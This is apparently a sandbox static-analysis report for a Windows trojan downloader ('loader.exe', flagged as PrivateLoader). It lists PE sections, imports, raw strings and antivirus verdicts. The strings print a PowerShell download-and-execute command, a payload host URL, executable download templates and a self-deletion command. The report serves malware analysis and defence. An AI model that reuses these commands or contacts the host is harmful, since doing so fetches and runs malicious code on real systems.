Static | ZeroBOX

PE Compile Time

2022-12-02 19:29:09

PE Imphash

7e3d431a1dbc2f47cc054da5d0f48777

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0001262e 0x00012800 6.63752851175
.rdata 0x00014000 0x00006c0a 0x00006e00 4.92691733131
.data 0x0001b000 0x0000ef18 0x0000e600 6.07240835498
.gfids 0x0002a000 0x0000012c 0x00000200 1.53376534848
.tls 0x0002b000 0x00000009 0x00000200 0.0203931352361
.rsrc 0x0002c000 0x00000870 0x00000a00 3.44216601519
.reloc 0x0002d000 0x00001550 0x00001600 6.54300882714

Resources

Name Offset Size Language Sub-language File type
AFX_DIALOG_LAYOUT 0x0002c330 0x00000002 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MENU 0x0002c338 0x000000bc LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_DIALOG 0x0002c1a0 0x00000190 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_VERSION 0x0002c3f8 0x000002f8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x0002c6f0 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library WININET.dll:
0x414160 InternetReadFile
0x414164 InternetCloseHandle
0x414168 InternetCrackUrlW
0x41416c InternetOpenW
0x414170 InternetOpenUrlW
Library SHLWAPI.dll:
0x414148 wnsprintfW
0x41414c StrStrW
Library KERNEL32.dll:
0x414014 SetFilePointerEx
0x414018 GetConsoleMode
0x41401c GetConsoleOutputCP
0x414020 FlushFileBuffers
0x414024 WriteFile
0x41402c TerminateProcess
0x414030 GetModuleFileNameW
0x414034 CreateJobObjectW
0x41403c CreateMutexW
0x414040 CreateFileW
0x414044 GetFileAttributesW
0x41404c GetLastError
0x414050 lstrcatW
0x414054 CloseHandle
0x414058 ExitProcess
0x41405c GetCurrentProcessId
0x414060 GetModuleHandleW
0x414064 lstrcpyW
0x414068 GetTempFileNameW
0x41406c HeapFree
0x414070 HeapReAlloc
0x414074 HeapAlloc
0x414078 GetProcessHeap
0x41407c WideCharToMultiByte
0x414080 HeapSize
0x414084 GetStringTypeW
0x414088 SetStdHandle
0x41408c WriteConsoleW
0x414090 EncodePointer
0x4140a4 CreateEventW
0x4140a8 GetProcAddress
0x4140ac DecodePointer
0x4140b4 GetCurrentProcess
0x4140bc IsDebuggerPresent
0x4140c0 GetStartupInfoW
0x4140c8 GetCurrentThreadId
0x4140d0 InitializeSListHead
0x4140d4 RaiseException
0x4140dc TlsAlloc
0x4140e0 TlsGetValue
0x4140e4 TlsSetValue
0x4140e8 TlsFree
0x4140ec FreeLibrary
0x4140f0 LoadLibraryExW
0x4140f4 SetLastError
0x4140f8 RtlUnwind
0x4140fc GetModuleHandleExW
0x414100 GetStdHandle
0x414104 FindClose
0x414108 FindFirstFileExW
0x41410c FindNextFileW
0x414110 IsValidCodePage
0x414114 GetACP
0x414118 GetOEMCP
0x41411c GetCPInfo
0x414120 GetCommandLineA
0x414124 GetCommandLineW
0x414128 MultiByteToWideChar
0x414134 LCMapStringW
0x414138 GetFileType
Library USER32.dll:
0x414154 MessageBoxA
0x414158 wsprintfW
Library ADVAPI32.dll:
0x414000 GetSidSubAuthority
0x414004 OpenProcessToken
0x414008 GetTokenInformation
Library SHELL32.dll:
0x414140 ShellExecuteW

!This program cannot be run in DOS mode.
`.rdata
@.data
.gfids
@.reloc
tHj/Yf
[jx_j}3
j.[j\XjbYj]^jNZjVf
Xje_jrf
XjoYj}f
D$8f1LD
f1DLJA
f1DLJA
XjoYj,Zj.f
XjtYjqf
Zj:Yjcf
ZjqYjzf
jpYj_f
Yj3[j1f
f1LDJ@
D$@f1LD
f1LDJ@
D$@f1LD
URPQQh
;t$,v-
UQPXY]Y[
zSSSSj
f9:t!V
QQSVj8j@
PPPPPPPP
PPPPPWS
PP9E u:PPVWP
QQSVWd
Unknown exception
bad allocation
InitializeConditionVariable
SleepConditionVariableCS
WakeAllConditionVariable
bad array new length
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AreFileApisANSI
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
?5Wg4p
%S#[k=
"B <1=
_hypot
_nextafter
QIGQENUQAGZKIGZJMHMHSCERNEIICSIMIRQUVON
CWULRYREDJACMKQJMORHQTCHAOLCROOUBQPDYHZNASEZCAAJBH
ANFZNFDHCVCJLDBCRAIFVDKAIRNWCHSOUTRBGZSILFOWHNNRHCDADDZJUAXLSRHLKEFZ
IYSFWQOYF
XFQEUOTSHJGKLHBJODJQ
IKGDIQBERGMHOYXQJCKPQVCUJV
MVGLQMEYCFOXAHQFPEXIAQUGEGUBNZ
SITUYYGQRJZCTGKOIFFC
XAKDTEKEWNOQHLJWAHSFSTLUZIVOTJUKMGOTYTUETIODDHPAQEXJIMRMDTRPYSUXJMTZNFPDGPLUJICDFYYUBRY
QEDFMGZMFOFUTYTRLVAICLHQAJQDLTVGNGEUDEYCYXZPSIIYPQBYEWPSJXKOPNTAJTOZLJKKINCVWX
JQDBHCVBWDYZFNGBEY
GCOSJXV
FGUVHLWUCJLNGDYUEUWFYMYSRBAENHCZRKIQIDAN
BAWRBOBGFIQ
TMZWMKKFSOQSBTZDUHABGTLCWBLPDELBAYOSZJOYXUMGEB
UZMETLGLZOGDILBROQKWGTTAJNOMBW
FOKRGHPYCBJTDHSQUNJRYZVVETCQSPUSSPATZIVNRTELVHUZX
ZPBCCHXJOWTNIRWWGQMNWPHLATUCVMAPIVYKXNHVLBKROLXWUFZXDN
QHBHRBQ
YEODBIVXMJUMUOXLGBLFJCWXHENNVPOYWRBSKHMHMTVSSWKFQZBDQAUXFZKUJYKJXQKREIPLYALZGRDANWOXVRFEI
MYAFZSWJDIXZRGLNBYOSSUTJK
PTSTSYRYKLGNCSMNHPMPUVQPQKEEWTKCFZDHMKTTNFSH
SBJNHBQUYEFWIEATIOPSQNHRTUFEVXGLOCVSBXXJDDXFWDGPXFWLCHFFQOCMWZDG
BPEQQYHUFLPBDLCXPHPYNUHNXUMRSSZXJUSPUCZYEUOVPHUPZZPQGHVURYQ
HABLNTJJRXDVGMDSFQBRZNJQNAZOCCOYXITDKZWGUZPGMBGVGQFGEJBXJIXVGHIPBIZSPWLIQCOSHIHKOFUJQKGMEUCE
IMHFMCFVIC
UXZBCLRVPENBENCMKWTUYSJUXJVJODPUCNVDHWEKCVMHFKPMZMDIJUHNKWFFJQ
UCVOSIAPSYSXFKBFSQLQTHVTNGIPEPESVATETLZDSBVVKNFXAPHWDNCPSJUBCHVVLFYNDHWIHDYNALXZQDFEODYVN
OKGDVCCHTVHMGLTVGPTLMKBTBSZIYDHUOIWMOEMIHTWZRTDVHBFXQJQ
KUVAIYGWQMYLUDOKKZCQIDGWSAHFSYHF
string too long
invalid string position
02:29:07
bad exception
.text$mn
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.gfids$y
.tls$ZZZ
.rsrc$01
.rsrc$02
InternetQueryDataAvailable
InternetOpenUrlW
InternetOpenW
InternetCrackUrlW
InternetCloseHandle
InternetReadFile
WININET.dll
wnsprintfW
StrStrW
SHLWAPI.dll
WriteFile
ExpandEnvironmentStringsW
TerminateProcess
GetModuleFileNameW
CreateJobObjectW
GetEnvironmentVariableW
CreateMutexW
CreateFileW
GetFileAttributesW
GetSystemWow64DirectoryW
GetLastError
lstrcatW
CloseHandle
ExitProcess
GetCurrentProcessId
GetModuleHandleW
lstrcpyW
GetTempFileNameW
HeapFree
HeapReAlloc
HeapAlloc
GetProcessHeap
WideCharToMultiByte
KERNEL32.dll
wsprintfW
MessageBoxA
USER32.dll
GetTokenInformation
OpenProcessToken
GetSidSubAuthority
GetSidSubAuthorityCount
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
CreateEventW
GetProcAddress
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
IsProcessorFeaturePresent
IsDebuggerPresent
GetStartupInfoW
QueryPerformanceCounter
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
RaiseException
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
SetLastError
RtlUnwind
GetModuleHandleExW
GetStdHandle
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
GetEnvironmentStringsW
FreeEnvironmentStringsW
LCMapStringW
GetFileType
SetStdHandle
GetStringTypeW
HeapSize
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
SetFilePointerEx
WriteConsoleW
EncodePointer
DecodePointer
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
b!IDATx
VUU5:''
D"u---
oiiyFU
8v~oC$
]hlmDc
onn~<##
Z0G,.`M
0[N~|R
v>3lz2Zk
JKKO())
LKC|z|
8P)**z
Tn$SY
-b(*vg}.:
(TU%BK
! nHxn
W_}u(3
p37n3
qx/iN@
T73.b<(
yf[jTP
P5jB5P
?eP#4
<kMthD
G~y:>(
0-Xk,,
#f7BWy
AC0Tnn
S1<sh,?
T71-Ax
f%67nC
R|\&_X/
xBSMu}
BssseFF
CNOu3;
Ja>}%"S
kll\eggx
C+**^C
QoP;W[
OGskPR
_86NTA
{'77wx
SMNJ08s
wJfff.v
xcccmYY
EEES233
/Vw!QA`
!%%%)%%%)
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
1$1V1`1m1
2)2U2[2}2
30363b3v3
44<4G4`4m4|4
42585?5t5
5&6,6N6T6[6
8!9'9I9O9Y9
:@:K:X:h:
:%;+;2;D;
<"<r<x<
0#0<0H0}0
1A2\2m2~2
2?3K3X3d3
464N4f4~4
5&5>5V5n5
6 6.6<6J6X6f6
7)787G7V7e7
;*;7;W;};
<+<7<C<O<[<
=&=@=Z=i=x=
>;>l>~>
101H1`1x1
2 202@2P2`2p2
3 303@3P3`3p3
4 404@4P4`4p4
5/5I5c5}5
7+7:7I7X7g7v7
8*898H8W8f8u8
9)989G9
:0:A:M:Y:
;7;T;f;x;
=)=9=I=Y=i=y=
>R>d>p>
0$030B0T0f0
0.1E1\1s1
2'262H2Z2l2~2
606H6`6x6
7(787H7X7h7x7
8(888H8X8h8x8
9(989H9X9h9x9
:(:8:H:X:h:x:
<#<7<K<_<v<
=-=<=K=Z=i=x=
>->9>E>Q>]>
?#?7?N?e?|?
0#020A0P0
1"1.1:1
6'6-6=6x6
7-7D7x7
8(808C8O8^8c8l8
9#9*91999A9I9U9^9c9i9s9}9
:#:*:1:8:@:H:P:[:`:f:p:z:
<3<:<@<R<\<
>.>?>D>I>j>o>|>
3,333i3r3
454A4P4Y4f4
5"5'5M5R5
<W<g<~<
='=,=1=X=a=f=k=
>L>T>Y>i>s>
3+3F3W3c3
5E6_6h6
9 9>9V9q9|9
=c=k=u=~=
,1^1e1
5,6q6u6}6
7#7)777U7n7s7
8.8G8X8a8
8F9S9l9q9z9
=>=Q=]=
1$1=1V1t1
2G2\2n2{2
3$3.3m3
?0???I?V?`?p?
2*33373=3A3G3K3U3h3q3
4C5h6m6s6x6
9>9Z9h9t9
:=:U:e:y:~:
;!;<;K;V;[;`;{;
=)>;>o>
?0F0M0T0a0
2I3c3h3N5h5w5
6%626@6N6Y6o6
9#9D9V9h9z9
:=:O:a:s:
090d0q0
9>9[9z9S:
<,<9<><L<
=1>C>U>
112P2\2
3=4W4d4
5p6v6{6
9I9Q9Y9a9i9
K0L1\1m1u1
2Q2`2l2{2
2<3E3N3W3
>+?0?4?8?<?
244Z4z4
4L5O6`6
8 989>9F9
2 2$2(2,2024282<2
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
50<8<@<D<H<L<P<T<X<\<d<h<l<p<t<x<|<
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9,?4?<?D?L?T?\?d?l?t?|?
0$0,040<0D0L0T0\0d0l0t0|0
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6
H0P0X0`0h0p0x0
1 1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7
;$;,;4;<;D;L;T;\;
7 7$74787<7D7\7l7p7
8 8$8(808H8X8\8l8p8x8
= =0=8=@=H=L=T=h=p=
>4>8>T>X>`>h>p>t>x>
?0?P?l?p?
000P0p0
101P1p1
282@2D2\2`2|2
7 7$7(7,7074787<7
484P4x4
Aadvapi32
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
Aja-JP
Aapi-ms-win-core-datetime-l1-1-1
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-synch-l1-2-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernel32
api-ms-win-appmodel-runtime-l1-1-2
user32
api-ms-
ext-ms-
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
kernel32.dll
programdata
/c ping 127.0.0.1 && del "%s" >> NUL
ComSpec
uykluyk65u56
%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe
%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe
%ComSpec%
config_20.ps1
config_40.ps1
\system32
%s\sysnative\%s
https://osecweb.ir/js
/c "powershell -command IEX(New-Object Net.Webclient).DownloadString('%s/%s')"
%s/ab%d.exe
%s/ab%d.php
AFX_DIALOG_LAYOUT
Dialog
MS Shell Dlg
msctls_progress32
SysMonthCal32
Button1
SysTabControl32
delgjmfdkgjre;terw
kjqw;krejwrehk;re
trehrteiq
erhyortehrte
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
TODO: <Company name>
FileDescription
TODO: <File description>
FileVersion
1.0.0.1
InternalName
loader.exe
LegalCopyright
Copyright (C) 2022
OriginalFilename
loader.exe
ProductName
TODO: <Product name>
ProductVersion
1.0.0.1
VarFileInfo
Translation
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.PsDownload.a!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win32.Generic.ch
ALYac Dropped:Generic.BAT.Downloader.D.718DCAB0
Cylance Unsafe
Zillya Downloader.PsDownload.Win32.2049
Sangfor Downloader.Win32.Kryptik.V9gm
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanDownloader:Win32/PrivateLoader.e2a70492
K7GW Trojan ( 0059b5ae1 )
K7AntiVirus Trojan ( 0059b5ae1 )
huorong TrojanDownloader/Agent.aky
Baidu Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win32/Kryptik.HROL
APEX Malicious
Avast Win32:Evo-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Win32.PsDownload.gen
BitDefender Dropped:Generic.BAT.Downloader.D.718DCAB0
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Dropped:Generic.BAT.Downloader.D.718DCAB0
Tencent Malware.Win32.Gencirc.10bdafcf
Sophos Mal/Generic-S
F-Secure Heuristic.HEUR/AGEN.1310461
DrWeb Clean
VIPRE Dropped:Generic.BAT.Downloader.D.718DCAB0
TrendMicro Clean
McAfeeD ti!E98AE7F96F7C
Trapmine malicious.high.ml.score
CTX exe.trojan.kryptik
Emsisoft Dropped:Generic.BAT.Downloader.D.718DCAB0 (B)
Ikarus Trojan.Win32.Crypt
FireEye Generic.mg.f7f61ffb8e1f1e27
Jiangmin Clean
Webroot W32.Trojan.Gen
Varist W32/Agent.FIK.gen!Eldorado
Avira HEUR/AGEN.1310461
Fortinet W32/Kryptik.HROL!tr
Antiy-AVL Trojan/Win32.Kryptik
Kingsoft malware.kb.a.998
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.BAT.Downloader.D.718DCAB0
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Downloader.Win32.PsDownload.gen
Microsoft Trojan:Win32/PrivateLoader!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5320025
Acronis Clean
McAfee RDN/Generic Downloader.x
TACHYON Clean
VBA32 BScope.TrojanPSW.Coins
Malwarebytes Malware.AI.504293961
Panda Trj/Chgt.AA
Zoner Clean
TrendMicro-HouseCall Clean
Rising Downloader.Agent!1.E11E (CLASSIC)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.73835411.susgen
GData Dropped:Generic.BAT.Downloader.D.718DCAB0
AVG Win32:Evo-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Trojan[downloader]:Win/PrivateLoader.Gen
No IRMA results available.